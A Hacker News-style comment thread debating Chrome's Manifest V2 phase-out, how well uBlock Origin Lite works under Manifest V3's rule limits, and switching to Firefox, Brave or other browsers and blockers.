May I be blunt? I grew up in it, so yes. I am. I was there for the Windows virus wildfires. I was there for the malware distribution schemes. I was there for the first wave of enshittification. For the dotcom crash. For the spam wars. For the search engines that didn't work. For the JavaScript injection attacks. For the world where "nobody knew you were a dog" as long as you didn't talk like yourself. I couldn't trust most of my relatives to use a computer the way we had to use them in the late '90s / early aughts. That's not a problem now.
For all its flaws, the modern system is cleaner, simpler, faster, and better for end users and no longer requires them to be super-nerds (and meanwhile, open and malleable devices are still there for the super-nerds to play with and work with). This was the goal---to make computers something that benefit everyone, not just the technorati and the priest-class.
May the past become a foreign country, hard for the modern mind to comprehend. May it always be so.
Punching down into a brutal labor environment instead of punching up into a Congress which was blatently bought off to foment this outcome? Odd choice.
I think it's part of a much bigger trend in tech in general but also in Google: Removing user control. When you look at the "security" things they are doing, many of them have a common philosophy underpinning them that the user (aka device owner) is a security threat and must be protected against.
IMHO that's actually part of an even bigger societal trend. "You will own nothing and be happy."
The ones in power want to control everyone and turn them into mindless sheeple to be exploited and milked. It's not just tech. There's another comment around here that mentions features being requested by large corporations and governments.
Adblock doesn’t only make Google Chrome bearable, it makes the internet bearable. I recently uninstalled my Adblock for testing purposes. Most websites nowadays are just ads with a little bit of text in between
I'd like to think that's true, but I don't know, because people seem to have a very high tolerance for advertisements. Surprisingly so. I have a very low tolerance, and do what I can to get rid of them. But then, every once in a while I use someone else's computer and see how they live with them. I say "I can show you how to get rid of those ads," but they usually just don't care enough to do it. I bet the majority of people are like that—maybe the vast majority—and Google is probably making the same bet, but with even more information. My prediction is that if (God willing) Chrome loses significant market share, it'll be for some other reason than this.
This is sort of like planting trees. I cut bait on chrome when they first announced they were dropping/impacting adblockers. For the most part, things are good enough the only time I spin up chrome is confirming something renders as expected on a personal site. Firefox works well enough for streaming and surfing.
The widespread adoption of Chrome was largely driven by word of mouth, people like you and I installing it on our friend's/relative's computers and telling them it was safer/faster/better.
Nothing stops us from doing the same thing again. I've been recommending Firefox to all my family/friends/colleagues for years (ever since I've seen the writing on the wall for Chrome). While Firefox isn't perfect, it's in a much better place than Chrome is, and meets the the needs of nearly 100% of people.
>The widespread adoption of Chrome was largely driven by word of mouth
No, it was driven by having a banner in the most privileged spot of the Internet, Google.com (the most visited site in the world with 0 ads on the homepage) saying that was faster and more secure than the alternatives. In fact Firefox benefited from some free ads on Google.com against Internet Explorer before Google developed Chromium.
The other aspect, somewhat memory-holed, was that Chrome was automatically installed as shovelware if you went to install Adobe Flash for IE or Firefox:
It was kind of both, depending on the timeline. Early on it was word of mouth, then Google saw they had momentum and they capitalized on it with the banners and aggressive marketing.
So many replies in this sub thread opining authoritatively. Share your source. Did you have access to the data on Chrome's user growth and which marketing campaigns were the sources of which users?
From my perspective, all of you are saying a lot of things as if you know them to be true, but you have no idea whether they're true or not; really, you just find them to be plausible.
Early chrome was driven by the fact that firefox was a piece of garbage. Firefox 3 was not good software, and had an unpleasant habit of totally crashing the entire browser regularly. Your only other popular choice was ie8. Also not great.
Later Google's ability to buy installs and put it on google.com came into play, but for at least the first 5 years and probably longer, chrome was a far faster, more secure, and more reliable choice. They also pioneered the multi-process model to isolate different components of the browser.
Yeah, I feel like in general we on HN give ourselves way too much credit in terms of our ability to drive public opinion or affect purchasing/usage patterns among the public. The idea of the “nerd-led revolution” may have had some impact in the past, but I think the days of that are over. Large corporations now know what they’re doing in ways that they hadn’t figured out in the 2000s or even the early 2010s.
I swear I also remember it getting included in installation wizards for unrelated software (on Windows), so people would end up with Chrome/Chromium without even realizing it.
I’ve been out of the windows game for so long I forgot all that malware that was installed by various installer engines and was so relieved when I found portable apps and oldversion.com and ninite. And now I guess there are things like chocolaty that do similar things. Switching to Mac and Linux I don’t really miss it at all
I'd argue it won't make a dent in Chrome market share.
People who really care about this (tech minded people) are not using Chrome anyway, others (regular people) will switch to less powerful Manifest V3 adblockers that would probably be good enough and won't switch from Chrome.
Manifest v3 changes are pretty reasonable. Declarative filtering that prevents untrustworthy software from getting access to data is objectively a good thing.
It's just that uBlock Origin is so important and trusted it should have access to everything. Truth be told it should be literally built into the browser itself and deeply integrated with it. Only conflicts of interest prevent that. Can't trust an ad company to maintain ad blockers after all.
The problem isn't the declarative filtering per se. The problem is the draconian limit on the number of filters. Given that we can compile regular expressions to DFAs and evaluate them in O(len(url)) time no matter how many patterns we have, there's little reason to place an arbitrary cap on the sophistication of an extension's filtering.
There was already an established solution for running untrusted code - the WebAssembly engine sandbox. Data can't be exfiltrated if imported functions are forbidden, which would be very easy to verify via static analysis of the WASM module. All of this hullabaloo about Manifest v3 could have been avoided if the Chrome team did the sane thing and exposed an API for using a WebAssembly module for filtering.
> everyone knows this is solely about making adblock less effective
I thought I knew that.
Then I switched from uBlock Origin to uBlock Origin Lite in Chrome, which is compatible with Manifest v3. I was prepared for the horrible onslaught of ads, expecting at least a quarter would start getting through, ready to switch to Firefox...
...and didn't notice a single change. Not a single ad gets through.
And at the same time, loading pages feels a little faster, though I haven't measured it.
Which has now got me wondering -- what if Manifest v3 really was about security and performance all along?
Because if Google was using it to kill adblockers, they've made approximately 0% progress towards that goal as far as I can tell. If they really wanted to kill adblockers, they'd just, you know, kill adblockers. But they didn't at all.
This is just because Google was especially insidious about how they crippled ad blockers in v3.
Adblockers do multiple things:
1. Visibly block ads from the user
2. Block the user tracking that's attached to those ads
3. Protect the user from malware
4. Save bandwidth and cpu cycles by not loading all that junk
5. Allow control to users over how a webpage is displayed to them
Arguably uBlock Origin Lite can only accomplish some of #1 and a sprinkle of #2 now. And even those abilities are compromised by artificially low limits imposed by chrome in v3 that will eventually allow ad networks to overwhelm those limits and get ads through to users.
Google is 100% boiling the frog here and you/the average user is left in the pot unaware.
Manifest v3 blocks user tracking -- if the request is blocked, any tracking attached to it is blocked. I'm sure it's not 100% perfect, but it's certainly working well enough in practice.
And what malware are you talking about? If a request is blocked, it's blocked. It doesn't matter if it's an ad or malware.
Manifest v3 is better at #4, because the junk isn't loaded, and the blocking is more efficient in terms of CPU.
And then #5 I don't know what you're talking about. I use Stylus and Tampermonkey to customize webpages and they continue to work great.
So I just don't see the evidence that "Google is 100% boiling the frog here". That's what everyone was saying, but now that Manifest v3 has come out, I just see adblocking that continues to work and uses less CPU to do it.
I see a lot of fearmongering around Google, but now that the results are in with Manifest v3... they just don't seem true. You're making all these claims, but I just don't see the evidence now that we're seeing how it works in practice.
Explain to me how uBlock Origin can realistically go from 100,000 to 500,000 dynamic rules down to 30k rules(only 5k of those can be dynamic) in the Lite version without losing the ability to actually block everything?
These limits are easy targets for ad networks to overwhelm or outmaneuver.
That's what everyone was saying
Everyone was saying that the new API is less capable than the old API at blocking things. DeclarativeNetRequest IS less capable; that's just a fact.
No one was saying that adblockers would literally stop working, so it's beyond disingenuous to dismiss people's issues with these changes by just saying 'works for me'.
What evidence would you actually accept anyway? Do you need a leaked internal document from Google saying literally 'devs, go neuter adblockers' before you believe Google might have bad intentions surrounding people's ability to block ads and tracking?
If security and performance were the actual driving forces of DeclarativeNetRequest, then they would have simply added it in addition to the existing webRequest block functionality. uBlock Origin and most extensions would have happily moved the majority of their rules to the static list if it meant better performance and privacy while keeping around the webRequest blocks for the things that actually need it.
Google has gone from having only one nuclear-level option for influencing adblockers (aka delisting) to now having its boot softly pressed against their necks and plenty of levers to pull. And you want me to look at that and go, 'There's no direct evidence of malicious intention there... so perfectly normal and/or acceptable behavior by the world's biggest ad company'?
> Explain to me how uBlock Origin can realistically go from 100,000 to 500,000 dynamic rules down to 30k rules(only 5k of those can be dynamic) in the Lite version without losing the ability to actually block everything?
I will take this one.
First, your limits are out of date. The static minimum is 30k, but can now escalate to an order of magnitude higher depending on how many extensions are installed. The dynamic limit is now 30k, of which at most 5k can be "unsafe". Source: https://developer.chrome.com/docs/extensions/reference/api/d...
Second, even if the limits were correct: consider the possibility that 99% of those rules are irrelevant, out of date garbage that blocks nothing anymore but haven't been removed because there is neither process nor incentive on the extension dev's part to do so.
Ad uses pattern. UBO adds matching pattern. Ad switches to new pattern. Cat and mouse.
This happens widely, rapidly, and on an ongoing basis. The result is that the rule set is large and grows rapidly, but very little of it is actually useful day to day. From the user's perspective, the only cost is that the browser very slowly gets continually less performant, which they will not attribute to the extension.
This isn't hypothetical. I'm on the Chrome team. We analyzed the rule set contents. This is why we proposed the initial limits we did: they were plenty large enough to allow all the extensions we analyzed to do everything they actually wanted to do, if only you stripped the cruft.
The rule size increases since then primarily come out of a dialog process with ad blocking devs about their process and needs and what they see in the wild coupled with what we think we can manage to keep performant. There are compromises. I'm not on that team so I can't speak to details. But it's part of an honest attempt to have a dialog.
There are usually simple explanations for things, if people were truly willing to consider them without bias.
Thank you for providing this valuable explanation -- I haven't heard this perspective expressed elsewhere. The fact that old rules would never get deleted but continue to drain resources makes some design decisions make a lot more sense.
One particularly pernicious outcome is that some ad blockers tout their rule set sizes as a feature, and users choose among blockers based on it, when if anything it is probably negatively correlated with blocker quality -- it's not necessarily a sign you're comprehensive so much as that you don't care about efficiency or cleaning up after yourself.
That's of course an oversimplification. But people who believe they're technically knowledgeable and adept are just as likely as other folks to fall for bullshit and be convinced to do things contrary to their own self interests. It's just a different type of bullshit.
No one wants to hear that, because we all want to tell ourselves that maybe everyone else is gullible, but WE'RE smart and rational. To a close approximation, though, none of us are.
> Explain to me how uBlock Origin can realistically go from 100,000 to 500,000 dynamic rules down to 30k rules(only 5k of those can be dynamic) in the Lite version without losing the ability to actually block everything?
I don't know and I don't have to. All I know is uBlock Origin Lite is still blocking everything. So it seems like 30K rules is plenty? Like it's not a meaningful difference for end users if it's blocking 99.99% vs 99.9999% of ads?
> No one was saying that adblockers would literally stop working
That's sure what it sounded like. That it would literally be so bad you'd have to switch browsers because of how degraded the experience would be.
> What evidence would you actually accept anyway?
The fact that the adblocking experience was significantly degraded for the average user -- e.g. that now 10% or 25% of ads were getting through.
> And you want me to look at that and go, 'There's no direct evidence of malicious intention there... so perfectly normal and/or acceptable behavior...
Yeah, pretty much. As far as I can tell, security and performance seem to justify the Manifest v3 changes. Occam's Razor says you don't need anything else. If you think there's malicious intention, then the onus of proof is on you.
I was told, time and time again, than Manifest v3 would result in an adblocking experience so bad that people would start switching browsers because of it, that Google was cracking down on adblockers to neuter them. Now that it's here and my adblocking works just as well, maybe even better (if it's sped up page loading times) -- then sorry, as far as I can tell the malicious intention was made-up.
> That's sure what it sounded like. That it would literally be so bad you'd have to switch browsers because of how degraded the experience would be.
> I was told, time and time again, than Manifest v3 would result in an adblocking experience so bad that people would start switching browsers because of it
Once enough ads catch up with the new limitations. Right or wrong, we're still too early for that.
uBlock lite can accomplish 2, 3, 4 completely. It's only #1 and #5 that are truly affected by v3. But those two were already pretty limited in chrominum browsers compared to firefox.
It can only accomplish #1 and #2 for 30k rules, most of which must de defined at the time of the extension release/update. As soon as that limit is exceeded an adblocker loses it's ability to accomplish #1, #2, #3, #4, or #5 effectively.
And if we are being honest about those limits, they have already been exceeded. Ublock origin is going from 100,000 to 500,000 dynamic rules to just 30k rules(only 5k of those can be dynamic) in the lite version.
> ...and didn't notice a single change. Not a single ad gets through.
When I tried UBO Lite recently it couldn't block YouTube ads, not sure if that's impossible with Manifest V3, or if UBO Lite just isn't updated regularly like UBO to defeat the YouTube anti-ad-blocking updates.
The same Google that's currently in legal hot water for always hiding its true motivations so effectively that even lawyers can't get any relevant documents?
People seem to see what they want. And many seem to be blinded by Google hate and must find ways to be unhappy with all decisions they make. Google has publicly delayed v2 depreciation to ensure ad blockers worked well under v3.
If I remember right then the difference is more about ad-tracking/privacy than blocking. V2 allowed UBO to find and intercept the calls to the ad servers before the calls were made. Where V3+UBL still makes the calls it just doesn't display the results. So while you might not see the ads, the ads see you.
> Where V3+UBL still makes the calls it just doesn't display the results. So while you might not see the ads, the ads see you.
That's not what the docs say [1]:
A single rule does one of the following:
- Block a network request.
- Upgrade the schema (http to https).
- Prevent a request from getting blocked by negating any matching blocked rules.
- Redirect a network request.
- Modify request or response headers.
Does "block" not mean block? Can you provide a source? Or am I looking at the wrong docs? I'm searching online and can't find anything that says the request is still sent.
On the contrary, MV2 used onBeforeRequest which let extensions see what requests you were making. They could then take that data and use it for malicious purposes.
MV3 doesn’t allow extensions to know what requests are being made, so extensions can’t use your data maliciously.
> On the contrary, MV2 used onBeforeRequest which let extensions see what requests you were making. They could then take that data and use it for malicious purposes.
Which is something we know for a fact uBlock Origin doesn't do. It's open source, you can check the code yourself. MV3, on the other hand, doesn't do much to assure me that an addon isn't phoning home. Why not just give the user to ability to block network requests on a per-addon basis? Too difficult a task for the trillion dollar company? Or could it be that forcing users to switch to MV3 addons isn't about safety at all?
Doesn't onBeforeRequest still exist in Manifest v3? The thing that's been removed is the ability to block on it, not the ability to register handlers for requests.
It still exists, but now “ad blockers” can’t use the blocking API to record and forward metrics on hits. Ad blockers don’t even need the webRequest and webRequestBlocking permissions anymore.
Now, if an ad blocker has webRequest permissions it’s a red flag.
With Manifest v3, let's say I'm an ad blocker and I want to get access to metrics not to violate privacy, but just to report them to the user (X domains blocked, Y out of Z requests blocked, etc). How would I get access to those metrics?
They removed webRequestBlocking, used mainly by adblockers, but left webRequest. The security implications are the same for both, but only the former is optimized for content blocking.
I hoped this day would never arrive, but alas all good things must come to an end. Since adopting uMatrix, my web experience radically changed and I can never go back to a pre-uMatrix world. With the v2 removal, I've got to eliminate Chrome from my life.
I also adopted a workflow that has been very conveninent for many years, essentially using Chrome for personal stuff and Firefox for work and other various things (especially once container support arrived!). It's not going to be easy to undo years of muscle memory, but I guess it's time to bite the bullet.
> We’re working on it! We’ve begun with some of our components and intend to open more in the future.
> Forking WebKit, porting hundreds of APIs and writing a browser app from scratch has been challenging for our small team. Properly maintaining an open-source project takes time and resources we’re short on at the moment, so if you want to contribute at this time, please consider becoming active on orionfeedback.org.
I won’t be touching this binary with a ten foot pole until every line of code is open.
Many excellent alternatives already exist that are also open and free, I don’t see a compelling argument to use this software on any device at the moment.
Curious why exactly and what is wrong with closed source paid for products? By that token nobody should be touching Safari or iOS/macOS for that matter?
Just a general rule of thumb that has served me well: If it's GPL, Apple wouldn't be using it. Apple hates the GPL as it is the antithesis of their operating model.
So I think from purely a licensing point of view, they are probably not in violation. Provided that the way they are linking the LGPL-licensed code is compatible with the LGPL.
But like the other commenter said, I too would not run any web browser that was not fully open source, like this Orion browser.
If they are forking Webkit, like they say, doesn't that require they distribute the source to their fork? Even if they don't have to distribute the browser linking to it?
I love Kagi, but I wish they focused on their core product first. Search is a hard problem to nail down and there's no shortage of bugs in Kagi right now, their issue tracker is a solid testament to that. When they spread their attention and resources between multiple products, they run the risk of pulling a Mozilla and shooting themselves in the foot multiple times.
They do focus on their core product first. I hang out in their discord, it's first priority always. Their other ventures are in service of the search engine— FastGPT powers quick answers, universal summarizer powers the "summarize this link" feature, small web is their go at an index of their own.
Orion is kind of a stretch I think, but they do see it as
being in service of their search product as it's the only way they'll ever be the default search engine anywhere.
For people who want to stick with a Chrome-based browser while still using the full-featured uBlock Origin: Brave will keep supporting uBlock Origin even after Manifest V2's removal from Chromium.
Nothing wrong with any of those positions. And largely irrelevant to whether he's good at his job and whether Brave is a good browser which it is for various reasons, one of which being he leads the company.
That's not true, he donated to organizations supporting California Proposition 8 which banned same-sex marriage which by the way was supported by the majority back then in California. That was also 16 years ago, it's time to let it go and stop spreading misinformation. You should instead not rely on ad-hominem and critize Brave for being ridden with cryptocurrency and doing shady stuff.
Do you have any evidence his opinion has changed? If you don't, then it's not misinformation, and no you don't get to demand people "let it go" because it was 16 years ago.
And donating to a specific cause shows a lot more commitment and understanding than a typical vote.
This submission title does not appear to be accurate. Here's what was actually said:
> October 9th 2024: an update on Manifest V2 phase-out.
> Over the last few months, we have continued with the Manifest V2 phase-out. Currently the chrome://extensions page displays a warning banner for all users of Manifest V2 extensions. Additionally, we have started disabling Manifest V2 extensions on pre-stable channels.
> We will now begin disabling installed extensions still using Manifest V2 in Chrome stable. This change will be slowly rolled out over the following weeks. Users will be directed to the Chrome Web Store, where they will be recommended Manifest V3 alternatives for their disabled extension. For a short time, users will still be able to turn their Manifest V2 extensions back on. Enterprises using the ExtensionManifestV2Availability policy will be exempt from any browser changes until June 2025. See our May 2024 blog for more context.
They said "we have started disabling Manifest V2 extensions on pre-stable channels", and the "Chrome canary" referenced in the submission title is a pre-stable channel. The submission title is accurate, but narrowly highlighting only one facet of Google's update statement.
None of your comments have actually provided evidence for this assertion, and the previous update dated June 3rd 2024 says users will start seeing a warning. So when between June 3 and October 9 did Google start actually disabling MV2 extensions, and where was it publicized prior to their October 9 update?
> None of your comments have actually provided evidence for this assertion
It's not an assertion. It's simple reading comprehension. How else can you interpret this?
"Over the last few months, we have continued with the Manifest V2 phase-out. Currently the chrome://extensions page displays a warning banner for all users of Manifest V2 extensions. Additionally, we have started disabling Manifest V2 extensions on pre-stable channels. [paragraph break] We will now [emphasis mine] begin disabling installed extensions still using Manifest V2 in Chrome stable."
> So when between June 3 and October 9 did Google start actually disabling MV2 extensions, and where was it publicized prior to their October 9 update?
I don't know if it was publicized, until now.
After all, when did they publicize that there would be a warning in Chrome stable? But there is a warning in Chrome stable. That started happening some time before this announcement.
So you literally don't know if it was news before now, but you're insisting on calling it "old news", apparently based solely on Google using past tense in their announcement.
> So you literally don't know if it was news before now, but you're insisting on calling it "old news"
That was just a figure of speech, which I don't wish to quibble over. I don't insist on using that phrase. The point, from the beginning, is that the HN submission title is not good.
It actually doesn't matter when exactly that Google began disabling MV2 extensions in Chrome canary, because what's the justification for focusing on canary in the submission title when the announcement says, "We will now begin disabling installed extensions still using Manifest V2 in Chrome stable"?
[EDIT:] I see that the submission title has now indeed been changed, so this argument has become redundant.
That's actually not the most relevant part. The most relevant part is "We will now begin disabling installed extensions still using Manifest V2 in Chrome stable. This change will be slowly rolled out over the following weeks."
Google had already started disabling Manifest V2 extensions on pre-stable channels, prior to October 9.
The first paragraph is "what we've been doing." The second paragraph is "what we'll do now."
I'm addition to all the calls to switch to another browser I'd also have people consider the websites they use as potential dependencies on chrome.
Right now most websites don't seem to require any specific chrome feature but with Google's pushing some API's like their Web Environment Integrity proposal I'm worried sites will start to lock their site to Google Chrome and their official Mobile clients.
Has anyone been using the v3 compatible version of uBlock Origin? Have you noticed much of a difference? From what I read there isn't supposed to be much of a difference?
Static list of uris versus live heuristics. So "much of a difference" depends a lot on what you browse. If your browsing is covered by the static list, yes...there's little difference.
Also, keep in mind advertisers are not unaware of all this movement. You don't think they'll try new tactics once they know everyone using chrome is now hobbled to solely static lists? That cloaking (or other approaches) won't then become really popular?
A lot of other ad blockers use static lists for years. The fact that they work tells that ad industry does not see the blockers as a problem that needs to be dealt with. It can also be that so far the increased cost of development of ads that are immune to simple static lists is not worth it.
I’ve noticed a huge number of websites have interstitials pop up asking you to remove your ad blocker. While some let you bypass it anyway some don’t. Clearly the websites themselves seem to care.
Right. Advertisers didn't bother with all these tactics because normal chrome users could download a plugin without any major hurdles to thwart it. Why drive people that wouldn't otherwise use an ad blocker to do so?
That's going away now. Now mostly everyone is vulnerable with the only recourse being pretty technical stuff, not just downloading a very popular plugin.
So advertisers will now be free to get more aggressive without much downside.
Edit: I do get that this sounds like conspiracy theory. But it really matches the Google boiling frogs approach. Removing the blocking onBeforeRequest, as one of the very first things in the manifest v3 spec was not a coincidence.
Even if Google did want to reduce effectiveness of ad blockers, doing that via removal of blocking webRequest API is a double-edged sword. It may push users to alternate browsers with more effective ad-blocking.
Besides, webRequest implementation in Chromium is a terrible collection of hacks on hacks. It is a good example how not to design or implement API. I will not be surprised if the removal of the API comes from a simple desire to remove that embarrassing code.
> onBeforeRequest was removed because it is a massive spyware and malware vector.
Yet you can still inject js right into the page. You just can't stop a page that was going to load from loading. They could have taken away the onBeforeRequest redirect capability and left just the onBeforeRequest cancel capability.
Not sure I've heard of any spyware/malware depending on just that cancel capability.
I feel like we're losing the plot here. Removing the cancel capability of onBeforeRequest didn't improve security much. It did, though, hobble ad blockers to just dealing with static lists if they want to prevent an ad from downloading in the first place.
Removing the onBeforeRequest redirect didn't add much security either, since you can just ask for permission B instead of permission A and just inject code. Though, ad blockers don't need that anyway.
It only sounds insane because you're saying "want extensions to snoop" to describe "want extensions to run a function call locally".
It is a permission that could be used by a malicious extension to snoop, but that is far from the only use. Wanting the permission != wanting snooping.
I have been using the Firefox version of it for more than a year by now, basically as soon as it came out. I commented on HN that I was going to do it: https://news.ycombinator.com/item?id=37219071
There's no difference whatsoever.
And it's not surprising because on my iOS device I've been using similarly architected content blockers since 2015. There's no issue with declarative ad blocking.
Of course this differs with the kind of sites you visit. So you need to try it on your own. I can believe that perhaps for some people this is a downgrade, but don't automatically assume uBlock Origin Lite won't work well for you.
Anyone jumping up and down about MV3 while using Mac or iOS are hypocrites, since MV3 is essentially doing the same thing Safari did years ago, finally matching the security and the privacy in that regard. The reduction in adblocking is so miniscule in aggregate - since declarative approach will always cover all the major advertisers - that it's not even a meaningful "trade-off".
> Anyone jumping up and down about MV3 while using Mac or iOS are hypocrites, since MV3 is essentially doing the same thing Safari did years ago,
iOS I'll give you, but macOS can in fact run ex. Firefox.
> finally matching the security and the privacy in that regard.
"Matching" inferior security+privacy is not a good thing. The only way this is an improvement if you think the blockers are malicious; otherwise a useful tool in the users interest has been made less powerful.
> Look at how many in Kaspersky’s list are advertised as ad blockers
By my count 5, 6 if we include "Autoskip for Youtube", out of 34. That might be an argument for dropping extensions, but I don't think it's an argument for breaking ad blockers.
> Those extensions used the same API that ad blockers used, but for malicious purposes.
Sounds like an obvious chance to flag the extension for further review, and probably a warning on the user side.
> So, you would support removing that API?
Of course not; that's throwing out the baby with the bath water. This brings us back to the "further review" thing; there's plenty of precedent for a platform having API surface that only a smaller subset of apps/extensions are allowed to use, because the features it exposes are legitimately needed for some things but it could be abused so it gets flagged and you have to write a detailed explanation for why your thing really needs this permission and then the reviewers can look at it particularly closely.
> Well, that’s what they did for MV3 and implemented an API just for ad blocking.
And then for bonus points they hobbled it so that it couldn't be used to make as good of ad blockers, which is why the whole thing is not okay.
Okay, if you absolutely must then make that specific API require extra audit approval from the extension store, but breaking it outright is throwing out the baby with the bathwater; in a world where the FBI outright recommends an adblocker because ads are such a strong malware vector ( https://techcrunch.com/2022/12/22/fbi-ad-blocker/ ), it's irresponsible to undermine uBo.
It’s similar, but not the same. Safari lets you dynamically generate rules that are then compiled for privacy and efficiency. The limits were increased to 150000 rules per content blocker due to user demands [1]. And each extension can have multiple content blockers.
MV3 has a measly 30000 static rule limit. These rules are included with the extension and cannot be updated dynamically. And a 5000 dynamic rules limit. [2]
EDIT: Chrome now has a 300000 shared pool for static rules for extensions that go over their 30000 limit. And a 30000 dynamic rule limit [3].
"Based on input from the extension community, we also increased the number of rulesets for declarativeNetRequest, allowing extensions to bundle up to 330,000 static rules and dynamically add a further 30,000."
https://blog.chromium.org/2024/05/manifest-v2-phase-out-begi....
It looks like it’s a shared quota now with a minimum per extension [1].
Still sucks that the rules are static though. AdGuard devised a method to diff ruleset changes with the built in rules to generate dynamic rules between extension updates. So, I guess it works.
Which adblocker are you using? I have adguard and dont get ads on most safari sites but its just static DNS blocking so first party ad servers like youtube dont get blocked.
Why should I need an adblocker app from some third party to which I have to grant full control over my browser? Apple would be enormously popular if they included one by default. Perhaps as an option you could disable. I don't know why all browsers don't do this (well, I know why Chrome doesn't).
Browsers are selected by users, they should have no obligation to show ads.
Brave is the only one doing this right AFAIK.
Almost all the problems with tracking and buying and selling user profiles would end if browsers just didn't show ads.
> And it's not surprising because on my iOS device I've been using similarly architected content blockers since 2015. There's no issue with declarative ad blocking.
Really?
Because I find adblockers on iOS are nowhere near as good - they let far more ads through, and they leave far more sites broken so I have to disable the ad blocker for the site to work.
I’ve been using AdGuard. There are some limitations with MV3, but it’s not noticeable [1]. AdGuard uses dynamic rules for updating rules between extension updates and for custom user rules. There’s the option using their system level AdBlocker too.
Another happy user of uBlock Origin Lite on Chrome here. No difference. 1Blocker on Safari user since Apple came out with the declarative adblocking system there as well.
I've been using Lite for the past few months, I've seen no real difference. I think if you're particular about rulesets or are heavily customizing uBlock you may want to consider switching browsers, but I'm happy enough that I'm remaining on Chrome.
I used the lite version while on chromium for some time. I noticed no difference in terms of blocking ads.
The main thing I missed was the ability to block arbitrary elements with the zapper. I use this for more than just ads, so losing it is a real loss in functionality. Otherwise it worked fine.
Yeah the zapper is indispensable. Being able to filter content on platforms by the words in post titles is one of the best ways to not be exposed to toxic content.
Never leaving your subscriptions (never using the algorithm recommended feed) is not a solution because of second-hand toxicity, e.g. political posts in meme subreddits in an election year.
If anyone knows of a solution that works in Manifest V3 I'd love to hear it!
I for one am just going to wait it out and see what the internet looks like nowadays without an adblocker, if it doesn't auto-update. It's been so long.
Adblockers are my least concern, a lot of other useful add-ons won't work, like Imagus, Redirector, Violentmonkey, etc. So I switched to Firefox a few months ago.
They seem to have the opposite going on, they often manage to fumble what little opportunity you'd think they have. Was just thinking of the ubo lite example you mentioned:
Can you guys just all go to Firefox so it has a chance, the way Chrome changes things is not acceptable and Firefox, performance wise, is just as fast even if people say otherwise. Try it and test for yourself.
I am tied to Microsoft Edge for sync between desktop and phone, and Microsoft Edge on iOS has AdBlock built in. But looking at this it seems inevitable that Edge will retain V2.
As to switching to Firefox? I'd love to, but Firefox on iOS refuses to put in an AdBlocker. Yea, you can use Firefox Focus but that one doesn't sync.
AFAIK, Microsoft is disabling manifest V2 extensions in Edge following the same timeline as Chrome[1]. Brave is continuing to run V2 extensions, but has no plan to stand up their own extension store[2], so it isn't clear how users will get the extensions, beyond a few handpicked ones that Brave is supporting[3].
Take a look at Vivaldi, as well - it covers all major desktop and mobile platforms now and syncs across all of them through their own servers, and it also has integrated adblock.
I think at this point I'd rather pay for a desktop browser, something with blocking baked in at compile time.
It would be such a QoL improvement that it's worth paying a yearly subscription for.
Chrome to Firefox is a relatively easy switch, especially for those that don’t depend on Google sync. The main sources of friction for me were the lack of a good profile switching UI (solved with a browser extension that mimics the Chrome menu), and weird security requirements for homemade extensions (IIRC if you want to have the extension persist after restarting Firefox, you need to sign the extension, which is a pain)
For users switching from Arc, there is no good alternative, but Firefox with Sidebery and custom CSS comes close.
I don't know if this is what you meant, but as an alternative to profile switching, there are Multi Account Containers [1].
It allows assigning a container to each tab, and the containers are isolated from each other. If you have an MS or Google account for both work and personal, you can open them at the same time in different tabs.
I'm using using multiple profiles when I want to have a different set of extensions, bookmarks and browsing history. Multi Account Containers help with none of that.
this is such a killer feature I don't understand why it even is an extension, every browser that isn't adversarial to the user should have that feature tbh
Note that Firefox profile management is getting an overhaul right now, including an easy profile switching UI. I'm not sure when it will be landing in release, but it is being actively built!
I've tried to switch from Vivaldi to Floorp and there is some things that Firefox does that drive me absolutely nuts.
The main one is the behaviour of pinned tabs. Pinning in Firefox turns it into an icon that is harder to hit and doesn't even protect it from closing. This makes them essentially useless, they should be moved to the front of the tab bar and be protected from closing.
The second is that when you use vertical tabs the tab bar acts like a title bar instead of a separate entity. This means you can't double click to create a new tab, and trying to drag a tab often results in the entire window moving. I have to use Tree style tabs and disable the normal tab bar completely to prevent this.
There are also things that I don't like such as how downloads are handled and I've has issues with my session tabs being saved properly.
> they should be moved to the front of the tab bar and be protected from closing.
Firefox pinned tabs are moved to the LHS of the tab bar, they have no close button and ctrl-W doesn't close them. How much more do you want them to be protected from closing?
This is actually one thing where Firefox is clearly better than Chrome ... Chrome pinned tabs close with ctrl-W which is really easy to do accidentally.
Middle click still closes tabs which is my most frequent way to close tabs.
As I mentioned Vivaldi is my Chromium based browser of choice, and it is far better in the handling of pinned tabs. They go up to a separate section at the start of the tab list without reducing in size, and then they absolutely cannot be closed without unpinning the tab first
> Also in chrome, multiple profiles need multiple google account(If I understand the UI correctly)connected, but in Firefox no account is needed.
You can use Chrome with multiple profiles by disabling the "Allow Chrome sign-in" option so that none of your browser profiles are tied to a Google account. I don't know if that option can be toggled on a per-profile basis, because I happen to prefer it off for all of my browser profiles.
I don't know much about Arc. But Arc users could give Firefox "Nightly" a try to preview new features coming up. It has vertical tabs and you can "pin" a few tabs at the top. Nightly also has containers already built-in, so you can have multiple accounts open for the same site in different container tabs.
In the past I've had a lot of issues with Google properties not working properly on Firefox -- either outright broken or using crazy amounts of CPU on Firefox but not Chromium-based browsers. Does anyone know if this is still an issue? I'd love to try again before I'm forced to by uBO breaking.
I love Mozilla, but I’m concerned about its future. Since 80% of its income reportedly comes from the Google search deal, do they have a plan to replace it after the recent ruling? And can they maintain their current level of autonomy while doing so?
The Android version of Firefox still doesn't have working keyboard shortcuts after 13 years or a way to delete individual history items to prevent broken auto complete. The money is going into lots of other things than the browser.
I'm not sure keyboard shortcuts for a version designed to run on an OS for devices without keyboards will ever be a priority. You can use a keyboard on an Android device, but the vast, vast majority of Android devices are phones that never get used with keyboards. I don't expect there's much priority to adding that feature.
I agree that a lot of money is going to things other than the browser though.
Killing adblocking in Chrome might be a boost they need to attract someone else to pay for being the landing search page. I doubt if anyone will pay as much as google though. Or probably even close.
There is something wrong with your Firefox installation (maybe try a new profile with vanilla settings). I use search shortcuts all the time (w + spacebar for wikipedia) and it's exactly the same behavior in Firefox than Chrome/Edge.
Anyone using a PiHole to block on their network? I've been aware of it, but honestly, ad blocking was good enough that I didn't go down that route. Is PiHole good enough? Is there a big problem with false positives?
Yep, and it's great. Beyond ads, you can also configure it to block malware. Got a phishing email from scammer.ru? Nothing happens even if you to click the link in it because that name won't resolve. There were a very short list of exceptions, maybe 2 or 3, I had to add to ours over the years, mainly for hostnames like tracking.shippingcompany.com that got added by mistake.
Note that it does nothing to block DNS over HTTPS lookups. If your browser insists on going around your LAN's DNS setup, Pi-hole can't help you.
